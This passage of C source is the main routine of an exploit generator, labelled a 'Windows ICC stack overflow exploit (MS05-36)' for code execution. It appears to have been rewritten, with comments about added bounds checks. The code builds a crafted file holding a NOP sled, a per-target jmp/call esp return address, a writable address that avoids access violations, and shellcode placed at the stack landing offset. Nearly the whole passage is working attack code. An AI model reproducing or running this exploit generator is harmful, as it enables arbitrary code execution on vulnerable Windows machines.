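 * Stops at the first entry whose jmpADD is 0 (the table's terminator) or at
 * the end of the array, whichever comes first, so a table without the
 * terminator can no longer be read past its end. The comparison is against
 * 0: the original compared the long jmpADD with the pointer constant NULL.
 */
void list_target(void)
{
    const size_t ntargets = sizeof targets / sizeof targets[0];

    printf("\nTargets \t\t\n");
    for (size_t i = 0; i < ntargets && targets[i].jmpADD != 0; i++) {
        printf("#%u\t%s\n", (unsigned)(i + 1), targets[i].os);
    }
}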



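/*
 * Store a 32-bit value at dst with memcpy instead of a `*(DWORD *)` cast
 * into the char array; v is expected already in file byte order (see t2b).
 */
static void put_dword(char *dst, DWORD v)
{
    memcpy(dst, &v, 4);
}

/*
 * Build the crafted file for the target named by argv[1] (a 1-based index
 * into targets[]). argv[2], if present, must be "0x<hex>" and replaces the
 * target's jmpADD. With no arguments prints usage and the target list.
 *
 * Validation the original lacked: the target index is parsed with strtol
 * and range-checked before targets[t - 1] is read (atoi() gave no error and
 * any value indexed the table), the override is parsed with a conversion
 * that matches its type, and the payload is checked to fit in buff before
 * anything is written into it. Failures go through err_exit().
 */
int main(int argc, char *argv[])
{
    const size_t ntargets = sizeof targets / sizeof targets[0];
    long fRetaddr = 0;

    if (argc < 2) {
        printf("\n\n");
        printf("* Windows ICC stack overflow exploit (MS05-36)\n");
        printf("* Code Execution Exploit\n");
        printf("* (c) Darkeagle [ private code ]\n");
        printf("* usage -> ms05-036 <target> (jmp/call esp)\n");
        list_target();
        return 0;
    }

    char *end = NULL;
    long t = strtol(argv[1], &end, 10);
    if (end == argv[1] || *end != '\0' || t < 1 || (unsigned long)t > ntargets) {
        err_exit("-> Invalid target number, see the target list");
    }

    /* %lx matches the long it is stored in; the original used %x with a long*. */
    if (argc >= 3 && sscanf(argv[2], "0x%lx", &fRetaddr) != 1) {
        err_exit("-> Return address must be given as 0x<hex>");
    }

    /* strlen() sizing is the author's contract: the payload contains no 0x00. */
    const size_t sc_size = strlen((const char *)shellcode);
    size_t tag_size = stack_land_offset - tag_content_offset + 1 + sc_size;

    /* dword_revert() works in whole 4-byte groups, so it may rewrite up to
     * 3 bytes past the payload; bound that rounded span, and the NOP fill,
     * by the buffer. All fixed offsets lie below stack_land_offset. */
    const size_t sc_rounded = (sc_size + 3) & ~(size_t)3;
    if (tag_content_offset + tag_size > BSIZE || stack_land_offset + sc_rounded > BSIZE) {
        err_exit("-> Payload does not fit in the file buffer");
    }

    memset(buff + tag_content_offset, NOP, tag_size);

    put_dword(buff + no_access_violate2, t2b((DWORD)targets[t - 1].writeable_add));
    put_dword(buff + no_access_violate, t2b(0x4));
    put_dword(buff + ret_addr_offset,
              t2b((DWORD)(fRetaddr != 0 ? fRetaddr : targets[t - 1].jmpADD)));

    /* sc_size came from strlen(), so memcpy copies exactly what strncpy did. */
    memcpy(buff + stack_land_offset, shellcode, sc_size);
    dword_revert(buff + stack_land_offset, sc_size);

    /* Round down to a multiple of 4, then add one more dword. */
    tag_size = (tag_size >> 2 << 2) + 4;
    printf("current size: 0x%.8X\n", (unsigned)tag_size);
    put_dword(buff + content_size_offset, t2b((DWORD)tag_size));

    buildfile();

    return 0;
}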
